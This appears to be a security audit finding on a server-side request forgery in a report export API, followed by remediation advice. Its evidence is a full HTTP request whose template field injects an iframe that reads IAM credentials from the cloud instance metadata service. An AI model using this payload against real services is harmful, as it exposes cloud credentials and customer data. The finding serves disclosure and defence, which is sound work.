Server-side request forgery exposes cloud credentials and customer data
Rated by the impact of the attack path above.
Evidence
POST /v2/reports/export HTTP/1.1
Host: api.example.com
Authorization: Bearer eyJhbGciOi…
Content-Type: application/json
{"template":
"<iframe src='http://169.254.169.254/latest/meta-data/iam/security-credentials/export-worker'></iframe>"} Remediation
- Treat template fields as text: escape user input before rendering, and turn off iframes and remote resource loading in the PDF renderer.
- Require IMDSv2 on all instances and set the hop limit to 1.
- Restrict the renderer’s outbound traffic to an allow-list of asset hosts.
- Scope the export role to the single bucket it writes to.